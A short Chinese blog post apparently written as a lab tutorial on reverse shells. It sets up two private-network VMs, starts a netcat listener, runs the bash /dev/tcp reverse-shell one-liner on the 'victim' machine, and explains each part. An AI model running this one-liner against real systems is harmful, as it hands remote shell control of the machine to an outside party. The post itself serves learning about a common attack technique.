反弹shell

shell
Linux
发布日期:   2021-09-10
文章字数:   162

1. 实验条件:

两台unix虚拟机:

* Ubuntu:192.168.220.16

* Centos:  192.168.220.4

Centos:

本地监听:

* nc -lvp 6767

Ubuntu:

受害端生成反弹shell:

bash -i>&/dev/tcp/192.168.220.4/6767 0>&1

image-20210908211335230

解释:

  1. nc -lvp 6767

-l监听 -v输出交互或出错的信息,-p端口。nc是netcat的缩写,可实现任意TCPUDP端口的帧听

  1. bash -i

-i interactive.即产生一个交互式shell(bash).

  1. /dev/tcp/IP/PORT

特殊设备文件(Linux文件),打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

文章作者: 尘落
文章链接: http://39.105.134.199/2021/09/10/77.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 尘落 !
shell
评论
  目录